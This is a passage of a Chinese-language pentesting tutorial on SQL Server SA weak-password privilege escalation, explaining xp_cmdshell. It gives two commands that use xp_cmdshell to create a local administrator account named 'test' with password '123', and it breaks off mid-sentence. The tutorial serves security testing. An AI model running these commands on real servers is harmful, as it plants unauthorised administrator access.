SqlServer SA 弱口令提权
数据库渗透测试 Windows渗透测试+安全加固
1、“扩展存储过程”中的 xp_cmdshell
Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。
网络安全中经常利用SqlServer SA弱口令的情况进行系统入侵,就是利用SqlServer中的"存储过程"获得系统管理员权限的,那到底什么是存储过程?
“存储过程”:其实它是一个“集合体”的总称,那么是什么样的集合体呢,就是存储在SqlServer中预先定义好的“SQL语句脚本集合”,说的更直白一些就是使用T-SQL语言编写好的各种小脚本共同组成的集合体,我们称之为“存储过程”。而存储过程这个集合体中的这些小脚本中,其危险性最高的“小脚本”就是扩展存储过程中的“xp_cmdshell脚本”,它可以执行操作系统的任何指令。如果我们能够获取SA的管理员权限,我们就可以使用SA的管理权限可以直接执行扩展存储过程中的“xp_cmdshell脚本”,并获得返回值。
2、利用 xp_cmdshell 添加系统账号
比如我们可以执行以下语句,进行系统账号的添加操作:
execmaster..xp_cmdshell'net user test 123/add'
execmaster..xp_cmdshell'net localgroup administrators test /add'
执行以上语句后,我们就在服务器上添加了一个用户名为test,密码为123的系统管理员。
到这里,我们应该就明白了ÿ